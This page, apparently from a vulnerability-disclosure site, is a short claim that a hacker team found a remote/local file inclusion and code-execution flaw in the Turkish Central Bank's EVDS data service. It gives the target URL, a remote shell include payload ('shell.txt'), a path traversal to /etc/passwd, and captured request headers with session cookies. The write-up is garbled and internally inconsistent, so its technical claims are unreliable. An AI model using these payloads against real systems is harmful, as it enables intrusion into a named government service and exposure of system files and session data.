Türkiye Cumhuriyeti Merkez Bankası RFI/LFI/RCE Vulnerability (CWE-661)

2020.02.24
tr Gaddar (TR) tr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-661

Vulnerability Author : Gaddar Team : SiyahBayrak TeamMates : Deadly-Warrior ~ StabilBey ~ Diablo Vendor HomePage : tcmb.gov.tr Vuln. URL : https://evds2.tcmb.gov.tr/index.php?/evds/serieMarket Description; Thanks to this vulnerability, remote code and files can be executed. Legal data of the site is stored. The source of the site includes php and lfi/rfi. Payload : index.php?sayfa= Example : index.php?sayfa=https://target.com/shell.txt Remote Codes; index.php <?php include ('data/$home/.../index.php'); ?> Payload URL : index.php?data=../../../etc/passwd PREVIEW; Accept: */* Accept-Encoding: gzip, deflate, br Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: keep-alive Cookie: BIGipServerEVDS2_HTTPS_POOL=1913432256.47873.0000; JSESSIONID=C7CA3B3E8343A73D36E9E01A25A7EF92; TS013c5758=015d31d691e014116d0f047d3655d2145c0949f6d903ddb8f7d3cba23d3804da926581ee0c2deb034ed073ab3b5fe39632f1879f7c295ca0b2040dcbf0c2bdccddb4e086d9a3bd63aa0aa6e3c227bca89adcfa9a7f Host: evds2.tcmb.gov.tr If-Modified-Since: Fri, 17 Jan 2020 13:02:06 GMT If-None-Match: W/"105932-1579266126000" Referer: https://evds2.tcmb.gov.tr/index.php? Sec-Fetch-Dest: script Sec-Fetch-Mode: no-cors Sec-Fetch-Site: same-origin User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36


See this note in RAW Version
Vote for this issue:
30%
70%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top